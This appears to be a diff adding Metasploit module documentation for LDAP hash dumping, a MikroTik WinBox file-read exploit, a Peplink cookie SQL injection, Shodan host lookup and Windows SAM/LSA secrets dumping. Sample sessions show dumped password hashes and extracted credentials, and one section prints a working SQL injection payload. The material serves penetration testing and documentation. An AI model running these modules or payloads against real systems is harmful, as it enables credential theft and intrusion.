+
+### PASS_ATTR
+
+LDAP attribute to take the password hash from. Defaults to userPassword,
+some LDAP server may use different attribute, e.g. unixUserPassword,
+sambantpassword, sambalmpassword.
+
+## Scenarios
+
+### Avaya Communication Manager via anonymous bind
+
+```
+msf5 > use auxiliary/gather/ldap_hashdump
+msf5 auxiliary(gather/ldap_hashdump) > options
+
+Module options (auxiliary/gather/ldap_hashdump):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   BASE_DN                     no        LDAP base DN if you already have it
+   PASS_ATTR  userPassword     yes       LDAP attribute, that contains password hashes
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      389              yes       The target port
+   SSL        false            no        Enable SSL on the LDAP connection
+   USER_ATTR  dn               no        LDAP attribute, that contains username
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   Dump  Dump all LDAP data
+
+
+msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS [redacted_ip_address]
+RHOSTS => [redacted_ip_address]
+
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against [redacted_ip_address]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=vsp
+[*] Dumping LDAP data from server at [redacted_ip_address]:389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726121633_default_[redacted_ip_address]_LDAPInformation_716210.txt
+[*] Searching for attribute: userPassword
+[*] Taking dn attribute as username
+[+] Credentials found: uid=cust,ou=People,dc=vsp:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[+] Credentials found: uid=admin,ou=People,dc=vsp:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/ldap_hashdump) > set USER_ATTR uid
+USER_ATTR => uid
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against [redacted_ip_address]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=vsp
+[*] Dumping LDAP data from server at [redacted_ip_address]:389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726121718_default_[redacted_ip_address]_LDAPInformation_712562.txt
+[*] Searching for attribute: userPassword
+[*] Taking uid attribute as username
+[+] Credentials found: cust:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[+] Credentials found: admin:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/ldap_hashdump) >
+```
+
+### NASDeluxe - NAS with Samba LM/NTLM hashes
+
+```
+msf5 auxiliary(gather/ldap_hashdump) > set USER_ATTR uid
+USER_ATTR => uid
+msf5 auxiliary(gather/ldap_hashdump) > set PASS_ATTR sambantpassword
+PASS_ATTR => sambantpassword
+msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS [redacted_ip_address]
+RHOSTS => [redacted_ip_address]
+
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against [redacted_ip_address]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=server,dc=nas
+[*] Dumping LDAP data from server at [redacted_ip_address]:389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726201006_default_[redacted_ip_address]_LDAPInformation_026574.txt
+[*] Searching for attribute: sambantpassword
+[*] Taking uid attribute as username
+[+] Credentials found: admin:209C6174DA490CAEB422F3FA5A7AE634
+[+] Credentials found: joe:58E8C758A4E67F34EF9C40944EB5535B
+[*] Auxiliary module execution completed
+
+msf5 auxiliary(gather/ldap_hashdump) > run
+[*] Running module against [redacted_ip_address]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+[+] Discovered base DN: dc=server,dc=nas
+[*] Dumping LDAP data from server at [redacted_ip_address]:389
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726201731_default_[redacted_ip_address]_LDAPInformation_427417.txt
+[*] Searching for attribute: sambalmpassword
+[*] Taking uid attribute as username
+[+] Credentials found: admin:F0D412BD764FFE81AAD3B435B51404EE
+[+] Credentials found: joe:3417BE166A79DDE2AAD3B435B51404EE
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,60 @@
+## Vulnerable Application
+
+MikroTik RouterOS allows unauthenticated remote attackers to read arbitrary files
+through a directory traversal through the WinBox interface (typically port 8291).
+
+Vulnerable versions of MikroTik RouterOS:
+
+* (bugfix) 6.30.1-6.40.7
+* (current) 6.29-6.42
+* (RC) 6.29rc1-6.43rc3
+
+MikroTik images can be downloaded from [here](https://mikrotik.com/download/archive)
+
+### Adding Users
+
+To add users to the MikroTik device, use the following commands:
+
+Get the groups first
+
+```
+/user group print
+```
+
+Add a user
+
+```
+/user add name=[name] password=[password] group=[group]
+```
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use auxiliary/gather/mikrotik_winbox_fileread`
+1. Do: `set rhosts [IP]`
+1. Do: `run`
+1. You should credentials.
+
+## Options
+
+## Scenarios
+
+### Mikrotik Cloud Router RouterOS 6.40.4
+
+```
+msf5 > use auxiliary/gather/mikrotik_winbox_fileread 
+msf5 auxiliary(gather/mikrotik_winbox_fileread) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf5 auxiliary(gather/mikrotik_winbox_fileread) > run
+
+[*] Running for 1.1.1.1...
+[*] 1.1.1.1 - Session ID: 54
+[*] 1.1.1.1 - Requesting user database through exploit
+[*] 1.1.1.1 - Exploit successful, attempting to extract usernames & passwords
+[*] 1.1.1.1 - Extracted Username: "write" and password "write"
+[*] 1.1.1.1 - Extracted Username: "read" and password "read"
+[*] 1.1.1.1 - Extracted Username: "admin" and password ""
+[*] 1.1.1.1 - Extracted Username: "user2" and password "password1"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,430 @@
+## Vulnerable Application
+
+### Introduction
+
+This module exploits an SQLi vulnerability in the web interface of Peplink
+routers running outdated firmware (confirmed on version 7.0.0-build1904 and below).
+
+The vulnerability is due to the lack of sanitization applied to the bauth cookie,
+Successful exploitation of the vulnerability allows unauthenticated attackers to get
+into sessions of legitimate users (bypassing authentication).
+
+Exploitation of this vulnerability requires that there is at least one active user session
+created in the last 4 hours (or session lifetime if it was modified).
+
+## Verification Steps
+
+
+## Options
+
+### BypassLogin
+
+If true, don't retrieve cookies, just use the SQL injection vulnerability to bypass the login
+In the case where expired and non-expired admin sessions exist, might select the expired session if enabled.
+
+### AdminOnly
+
+Only attempt to retrieve cookies of privilegied users (admins)
+
+### EnumPrivs
+
+Retrieve the privilege associated with each session
+
+### EnumUsernames
+
+Retrieve the username associated with each session
+
+### LimitTries
+
+The max number of sessions to try (from most recent), set to avoid checking expired ones needlessly
+
+## Scenarios
+
+Vulnerable firmware downloadable from [here](https://www.peplink.com/support/downloads/archive/).
+It's possible to reproduce the vulnerability without owning a peplink router, using
+[FusionHub](https://www.peplink.com/products/fusionhub/).
+Refer to its installation guide, use a free Solo license.
+
+### Firmware version 6.3.2
+
+BypassLogin:
+
+```
+msf5 auxiliary(gather/peplink_bauth_sqli) > set BypassLogin true
+msf5 auxiliary(gather/peplink_bauth_sqli) > run
+[*] Running module against 192.168.1.254
+
+[+] Target seems to be vulnerable
+[*] Checking for admin cookie : ' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')--
+[+] Retrieved config, saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkconfigur_203870.bin
+[*] Retrieving fhlicense_info
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkfhlicens_829403.txt
+[*] Retrieving sysinfo
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinksysinfo_824042.txt
+[*] Retrieving macinfo
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkmacinfo_992224.txt
+[*] Retrieving hostnameinfo
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkhostname_183370.txt
+[*] Retrieving uptime
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkuptime_523334.txt
+[*] Retrieving client_info
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkclient_i_704361.txt
+[*] Retrieving hubport
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkhubport_264378.txt
+[*] Retrieving fhstroute
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkfhstrout_701714.txt
+[*] Retrieving ipsec
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkipsec_664157.txt
+[*] Retrieving wan_summary
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkwan_summ_936160.txt
+[*] Retrieving firewall
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkfirewall_270172.txt
+[*] Retrieving cert_info
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkcert_inf_201536.txt
+[*] Retrieving mvpn_summary
+[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkmvpn_sum_261747.txt
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/peplink_bauth_sqli) >
+```
+
+The config is a .tar.gz archive with an added 36-byte header, you can extract the plaintext config:
+```
+$ dd if=20200802_fshhw1_1135E8A0DD29.conf of=config.tar.gz skip=36 bs=1
+$ tar vxf config.tar.gz
+```
+The config usually includes the admin password in cleartext.
+Note: it's also possible to upload a modified config.
+```
+$ cat config
+ADMIN_HTTPS_ENABLE="yes"
+ADMIN_HTTPS_LANONLY="no"
+ADMIN_HTTPS_PORT="443"
+ADMIN_HTTP_ENABLE="yes"
+ADMIN_HTTP_TO_HTTPS="yes"
+ADMIN_LANONLY="no"
+ADMIN_NAME="admin"
+ADMIN_PASSWORD="mySECUREpassword1"
+ADMIN_PORT="80"
+ADMIN_ROA_PASSWORD="user"
+ADMIN_SESSION_TIMEOUT="14400"
+CONFIG_VERSION="6.0"
+DHCP_SERVER="enable"
+FIREWALL_IDS="yes"
+HOSTNAME="peplink"
+IPSEC_NAT="yes"
+LAN_CONN_METHOD="static"
+LAN_IPADDR="192.168.1.254"
+LAN_NETMASK="255.255.255.0"
+LEFTTIME_USAGE="yes"
+...
+```
+
+EnumPrivs and EnumUsernames:
+
+```
+msf5 auxiliary(sqli/peplink_bauth_sqli) > set EnumPrivs true 
+EnumPrivs => true
+msf5 auxiliary(sqli/peplink_bauth_sqli) > set EnumUsernames true 
+EnumUsernames => true
+msf5 auxiliary(sqli/peplink_bauth_sqli) > run 
+[*] Running module against 192.168.1.254
+
+[+] Target seems vulnerable
+[*] There are 2 (possibly expired) sessions
+[*] Trying the ids from the most recent login
+[+] Found cookie wPJLPS6lqt8Ushwz1tlmz5tRbvI1ybwWRaBx2GRi3Qcu8, username = user, with read-only permissions
+[+] Found cookie aLvFyqho3JYoYSc7EROYWU5A7c4pz9IwV66mvnIzYwMPr, username = admin, with read/write permissions
+[*] Checking for admin cookie : wPJLPS6lqt8Ushwz1tlmz5tRbvI1ybwWRaBx2GRi3Qcu8
+[*] Checking for admin cookie : aLvFyqho3JYoYSc7EROYWU5A7c4pz9IwV66mvnIzYwMPr
+
+... <as above, gathering of data>
+
+[*] Auxiliary module execution completed
+msf5 auxiliary(sqli/peplink_bauth_sqli) > 
+```
+
+Verbose:
+
+When you enable verbose, you get the parsed XML document displayed.
+
+```
+msf5 auxiliary(gather/peplink_bauth_sqli) > set Verbose true
+msf5 auxiliary(gather/peplink_bauth_sqli) > set BypassLogin true
+msf5 auxiliary(gather/peplink_bauth_sqli) > run
+[*] Running module against 192.168.1.254
+
+[+] Target seems to be vulnerable
+[*] Checking for admin cookie : ' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')--
+[+] Retrieved config, saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkconfigur_780974.bin
+[*] Retrieving fhlicense_info
+[+]     data
+[+]             license
+[+]                     bandwidth
+[+]                             0
+[+]                     sessions
+[+]                             0
+[+]                     err_desc
+[+]                             Virtual machine server changed.
+[+]                     force_lic_page
+[+]                             1
+[+]                     activated
+[+]                             0
+[+]                     vm_server_address
+[+]                     expired
+[+]                             0
+[+]                     license_type
+[+]                             Invalid
+[+]                     expiry_date
+[+]                             2021-08-02
+[+]                     sn
+[+]                             1135-E8A0-DD29
+[+]                     license_key
+[+]                             YCB7EAN54FAEMTDF
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkfhlicens_867800.txt
+[*] Retrieving sysinfo
+[+]     data
+[+]             sysinfo
+[+]                     legal
+[+]                     company
+[+]                             Peplink
+[+]                     mvpn_version
+[+]                             5.0.0
+[+]                     version
+[+]                             6.3.2 build 1424
+[+]                     serial
+[+]                             1135-E8A0-DD29
+[+]                     product_code
+[+]                     hardware_revision
+[+]                             1
+[+]                     desc_support
+[+]                     product_name
+[+]                             Peplink FusionHub
+[+]                     name
+[+]                             1135-E8A0-DD29
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinksysinfo_739792.txt
+[*] Retrieving macinfo
+[+]     data
+[+]             macinfo
+[+]                     port {id=0}
+[+]                             mac
+[+]                                     08:00:27:52:8b:fc
+[+]                             name
+[+]                                     WAN 
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkmacinfo_307720.txt
+[*] Retrieving hostnameinfo
+[+]     data
+[+]             hostname_info
+[+]                     hostname
+[+]                             1135-e8a0-dd29
+
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkhostname_534719.txt
+[*] Retrieving uptime
+[+]     data
+[+]             subscription_mode
+[+]             systime
+[+]                     Sun Aug 02 14:31:21 CET 2020
+[+]             uptime
+[+]                     elapsed
+[+]                             2986
+[+]                     info
+[+]                             0 days 0 hours 49 minutes
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkuptime_233915.txt
+[*] Retrieving client_info
+[+]     data
+[+]             client_status
+[+]                     reserved_mac
+[+]                     client_list
+[+]                             client {type=0}
+[+]                                     rate_down
+[+]                                             0
+[+]                                     rate_up
+[+]                                             0
+[+]                                     active
+[+]                                     mac
+[+]                                             10:08:B1:CC:97:41
+[+]                                     ip {id=0}
+[+]                                             192.168.1.222
+[+]                                     ipn
+[+]                                             3232235998
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkclient_i_419158.txt
+[*] Retrieving hubport
+[+]     data
+[+]             port {id=wan}
+[+]                     mvpn_advertise_wan_network
+[+]                     tcpmss
+[+]                     mtu
+[+]                             1440
+[+]                     pppoe_sn
+[+]                     pppoe_password
+[+]                     pppoe_user
+[+]                     dns_custom_servers
+[+]                             8.8.8.8 1.1.1.1
+[+]                     dns_auto
+[+]                     dhcp_hostname
+[+]                     dhcp_client_id
+[+]                     mvpn_default_to_lan
+[+]                     gateway
+[+]                             192.168.1.1
+[+]                     netmask
+[+]                             255.255.255.0
+[+]                     ipaddr
+[+]                             192.168.1.254
+[+]                     bridge_mvpn
+[+]                     bridge_mode
+[+]                     conn_method
+[+]                             static
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkhubport_064122.txt
+[*] Retrieving fhstroute
+[+]     data
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkfhstrout_739377.txt
+[*] Retrieving ipsec
+[+]     data
+[+]             ipsec
+[+]                     order
+[+]                     nat
+[+]             linkinfo
+[+]                     link {id=1}
+[+]                             port {id=1}
+[+]                                     port_name
+[+]                                             WAN
+[+]                                     port_type
+[+]                                             ethernet
+[+]                                     actiavted
+[+]                             name
+[+]                                     WAN
+[+]                             enable
+[+]                     order
+[+]                             1
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkipsec_320666.txt
+[*] Retrieving wan_summary
+[+]     data
+[+]             connection_info
+[+]                     conn {id=1}
+[+]                             conn_method
+[+]                                     method
+[+]                                             dhcp
+[+]                             modem_idle
+[+]                                     timeout
+[+]                                             180
+[+]                             backup_group
+[+]                                     0
+[+]                             mvpn_nat
+[+]                             nat
+[+]                             enable
+[+]                             port_id
+[+]                                     1
+[+]                             name
+[+]                                     WAN
+[+]                     order
+[+]                             1
+[+]             physical_info
+[+]                     port {id=1}
+[+]                             ethernet_info
+[+]                                     simulated_mac
+[+]                                     default_mac
+[+]                                     mac_clone
+[+]                                     mtu
+[+]                                     advertise
+[+]                                     speed
+[+]                             port_name
+[+]                                     WAN 
+[+]                             type
+[+]                                     ethernet
+[+]                             activated
+[+]                                     yes
+[+]                     count
+[+]                             1
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkwan_summ_918579.txt
+[*] Retrieving firewall
+[+]     data
+[+]             firewall_ids
+[+]             firewall_mvpn
+[+]             private_firewall
+[+]                     default
+[+]                             accept
+[+]             outbound_firewall
+[+]                     default
+[+]                             accept
+[+]             inbound_firewall
+[+]                     default
+[+]                             accept
+[+]             linkinfo
+[+]                     link {id=1}
+[+]                             port {id=1}
+[+]                                     port_name
+[+]                                             WAN
+[+]                                     port_type
+[+]                                             ethernet
+[+]                                     actiavted
+[+]                             name
+[+]                                     WAN
+[+]                             enable
+[+]                     order
+[+]                             1
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkfirewall_758402.txt
+[*] Retrieving cert_info
+[+]     data
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkcert_inf_603637.txt
+[*] Retrieving mvpn_summary
+[+]     data
+[+]             mvpn
+[+]                     order
+[+]                     mvpn_nat_mode_dhcp_server
+[+]                             has_nat_profile
+[+]                                     0
+[+]                             nat_remote
+[+]                                     0
+[+]                             subnet_mask
+[+]                                     24
+[+]                             pool_end
+[+]                                     169.254.131.254
+[+]                             pool_start
+[+]                                     169.254.131.1
+[+]                             enable
+[+]                                     1
+[+]                     restrict_advertise
+[+]                             no
+[+]                     hc_mode
+[+]                             0
+[+]                     rn
+[+]                             1135-E8A0-DD29
+[+]                     site_id
+[+]                             333
+[+]                     l2vpn
+[+]                             wanport_supported
+[+]                                     false
+[+]                             wanport_name
+[+]                                     WAN Port Unavailable
+[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkmvpn_sum_970830.txt
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/peplink_bauth_sqli) > 
+```
+
+Loot:
+
+```
+msf5 auxiliary(gather/peplink_bauth_sqli) > loot
+
+Loot
+====
+
+host           service  type                          name  content             info  path
+----           -------  ----                          ----  -------             ----  ----
+192.168.1.254           peplink configuration tar gz        application/binary        /home/redouane/.msf4/loot/20200802153714_default_192.168.1.254_peplinkconfigur_157106.bin
+192.168.1.254           peplink fhlicense_info              text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkfhlicens_326973.txt
+192.168.1.254           peplink sysinfo                     text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinksysinfo_385353.txt
+192.168.1.254           peplink macinfo                     text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkmacinfo_525407.txt
+192.168.1.254           peplink hostnameinfo                text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkhostname_613045.txt
+192.168.1.254           peplink uptime                      text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkuptime_488261.txt
+192.168.1.254           peplink client_info                 text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkclient_i_529454.txt
+192.168.1.254           peplink hubport                     text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkhubport_938262.txt
+192.168.1.254           peplink fhstroute                   text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkfhstrout_737113.txt
+192.168.1.254           peplink ipsec                       text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkipsec_055562.txt
+192.168.1.254           peplink wan_summary                 text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkwan_summ_957693.txt
+192.168.1.254           peplink firewall                    text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkfirewall_777226.txt
+192.168.1.254           peplink cert_info                   text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkcert_inf_765605.txt
+192.168.1.254           peplink mvpn_summary                text/xml                  /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkmvpn_sum_890141.txt
+
+msf5 auxiliary(gather/peplink_bauth_sqli) > 
+
+```
@@ -0,0 +1,86 @@
+## Introduction
+This module uses the Shodan API to return all port information found on a given host IP.
+
+#### NOTE:
+In order for this module to function properly, a Shodan API key is needed. You can register for a free account here: https://account.shodan.io/register
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use auxiliary/gather/shodan_host`
+  3. Do: `set RHOSTS <targetip>`
+  4. Do: `set SHODAN_APIKEY <your apikey>`
+  5. Do: `run`
+  6. If the execution is successful, the port opening status of the target server will be obtained
+
+## Options
+
+  **RHOSTS**
+
+  The target machine(s) whose port information will be obtained from Shodan
+
+  **SHODAN_APIKEY**
+
+  This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
+
+  **Proxies**
+  A proxy chain of format type:host:port[,type:host:port][...] that will be used to establish the connection to the Shodan servers.
+
+
+## Scenarios
+
+### Single IP
+Running the module against a real system (in this case, the Google DNS server):
+
+```
+msf6 > use auxiliary/gather/shodan_host
+msf6 auxiliary(gather/shodan_host) > show options
+
+Module options (auxiliary/gather/shodan_host):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   SHODAN_APIKEY                   yes       The SHODAN API key
+
+msf6 auxiliary(gather/shodan_host) > set RHOSTS 8.8.8.8
+RHOSTS => 8.8.8.8
+msf6 auxiliary(gather/shodan_host) > set SHODAN_APIKEY *redacted*
+SHODAN_APIKEY => *redacted*
+msf6 auxiliary(gather/shodan_host) > run
+[*] Running module against 8.8.8.8
+
+[+] 8.8.8.8:53
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/shodan_host) >
+```
+
+### Domain Name
+
+```
+msf6 > use auxiliary/gather/shodan_host
+msf6 auxiliary(gather/shodan_host) > show options
+
+Module options (auxiliary/gather/shodan_host):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   SHODAN_APIKEY                   yes       The SHODAN API key
+
+msf6 auxiliary(gather/shodan_host) > set RHOSTS www.google.com
+RHOSTS => www.google.com
+msf6 auxiliary(gather/shodan_host) > set SHODAN_APIKEY *redacted*
+SHODAN_APIKEY => *redacted*
+msf6 auxiliary(gather/shodan_host) > run
+[*] Running module against 172.217.12.36
+
+[+] 172.217.12.36:80
+[+] 172.217.12.36:443
+[*] Running module against 2607:f8b0:4000:815::2004
+[-] The target IP address has not been scanned by Shodan!
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/shodan_host) >
+```
@@ -0,0 +1,176 @@
+## Vulnerable Application
+### Description
+The `windows_secrets_dump` auxiliary module dumps SAM hashes and LSA secrets
+(including cached creds) from the remote Windows target without executing any
+agent locally. First, it reads as much data as possible from the registry and
+then save the hives locally on the target (%SYSTEMROOT%\\random.tmp).
+Finally, it downloads the temporary hive files and reads the rest of the data
+from it. These temporary files are removed when it's done.
+
+This modules takes care of starting or enabling the Remote Registry service if
+needed. It will restore the service to its original state when it's done.
+
+This is a port of the great Impacket `secretsdump.py` code written by Alberto
+Solino. Note that the `NTDS.dit` technique has not been implement yet. It will
+be done in a next iteration.
+
+### Setup
+A privileged user is required to run this module, typically a local or domain
+Administrator. It has been tested against multiple Windows versions, from
+Windows XP/Server 2003 to Windows 10/Server version 2004.
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/gather/windows_secrets_dump`
+3. Do: `set RHOSTS <target>` (Windows host)
+4. Do: `set SMBUser <username>` (privileged user)
+5. Do: `set SMBDomain <domain name>` (only for domain users)
+6. Do: `set SMBPass <password>`
+7. Do: `run`
+8. You should get the dump result displayed
+9. Do: `hosts`
+10. Verify the host information is there
+11. Do: `services`
+12. Verify the service information is there
+13. Do: `creds`
+14. Verify the dumped credentials are there
+13. Do: `notes`
+14. Verify the notes are there
+
+## Options
+Apart from the standard SMB options, no other specific options are needed.
+
+## Scenarios
+The data shown below has been altered with random data to avoid exposing
+sensitive information.
+
+### Windows 10 Version 1809
+```
+msf6 > use auxiliary/gather/windows_secrets_dump
+msf6 auxiliary(gather/windows_secrets_dump) > options
+
+Module options (auxiliary/gather/windows_secrets_dump):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      445              yes       The target port (TCP)
+   SMBDomain  .                no        The Windows domain to use for authentication
+   SMBPass                     no        The password for the specified username
+   SMBUser                     no        The username to authenticate as
+
+msf6 auxiliary(gather/windows_secrets_dump) > set RHOSTS 192.68.43.12
+RHOSTS => 192.68.43.12
+msf6 auxiliary(gather/windows_secrets_dump) > set SMBUser msfuser
+SMBUser => msfuser
+msf6 auxiliary(gather/windows_secrets_dump) > set SMBPass mypasswd
+SMBPass => mypasswd
+msf6 auxiliary(gather/windows_secrets_dump) > run
+[*] Running module against 192.68.43.12
+
+[*] 192.68.43.12:445 - Service RemoteRegistry is in stopped state
+[*] 192.68.43.12:445 - Starting service...
+[*] 192.68.43.12:445 - Retrieving target system bootKey
+[+] 192.68.43.12:445 - bootKey: 0x3d354aa5e14d4360a1cc378a9e47338c
+[*] 192.68.43.12:445 - Saving remote SAM database
+[*] 192.68.43.12:445 - Dumping SAM hashes
+[*] 192.68.43.12:445 - Password hints:
+No users with password hints on this system
+[*] 192.68.43.12:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
+Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b7759c83c817e8b0082fb322bce0073b:::
+msfuser:1001:aad3b435b51404eeaad3b435b51404ee:035ad5f5a5c251c6fc3ba367bee86858:::
+[*] 192.68.43.12:445 - Saving remote SECURITY database
+[*] 192.68.43.12:445 - Decrypting LSA Key
+[*] 192.68.43.12:445 - Dumping LSA Secrets
+$MACHINE.ACC
+MYDOMAIN\MYDESKTOP$:aes256-cts-hmac-sha1-96:8f84e173f9a44708b56806e3d5ee9fa4d21c8edd0da7d29d64cf6122de399b07
+MYDOMAIN\MYDESKTOP$:aes128-cts-hmac-sha1-96:324719fca31fb90274acbd0bf07abf00
+MYDOMAIN\MYDESKTOP$:des-cbc-md5:7561afef18d6e7bb
+MYDOMAIN\MYDESKTOP$:aad3b435b51404eeaad3b435b51404ee:0cb18b83ab17e808b6604175784e8ec2:::
+
+DPAPI_SYSTEM
+dpapi_machinekey: 0xa197fe18d264c79b0996b3a987fcd6ea3b6191a6
+dpapi_userkey: 0xab025408f16dc46e6ba79a559751ea4890daf97b
+
+L$ASP.NETAutoGenKeysV44.0.30319.0
+09 5a a2 cf 23 a2 09 ee 4e 55 7b e4 53 98 5c 6c    |.Z..#...NU{.S.\l|
+6d cb 41 00 c8 18 4a 58 95 15 c6 56 98 fe da 79    |m.A...JX...V...y|
+71 d8 43 50 6f 23 f7 0b b9 97 50 d8 b2 a4 4c c9    |q.CPo#....P...L.|
+43 e6 45 23 ec ec 43 72 8c 1f 50 ad 52 a2 64 92    |C.E#..Cr..P.R.d.|
+4a 03 8e be b6 fc 85 4b 65 e3 d0 c7 66 34 0b 14    |J......Ke...f4..|
+13 ae e7 13 c8 25 6b f1 be 55 a4 fe de fa 4b 1d    |.....%k..U....K.|
+0a f5 4d 68 ea 3c 3b 65 d1 69 eb 70 5b 7d 35 1c    |..Mh.<;e.i.p[}5.|
+97 d6 e0 d1 15 65 4e 52 dc 1e 11 9e 35 6a 82 59    |.....eNR....5j.Y|
+30 98 e1 d2 64 0e 2c 2b 4c dd e6 fd 02 36 21 c1    |0...d.,+L....6!.|
+54 e0 18 7c e0 56 ee 25 4b ab b9 75 70 d2 cf c9    |T..|.V.%K..up...|
+38 8e 06 20 31 75 ca 52 d3 9f 6d 99 80 9c f1 ab    |8.. 1u.R..m.....|
+56 51 e3 de 62 be d4 bb ce f7 6b 9c f5 88 74 a7    |VQ..b.....k...t.|
+54 29 51 47 3b e2 9b 7a                            |T)QG;..z|
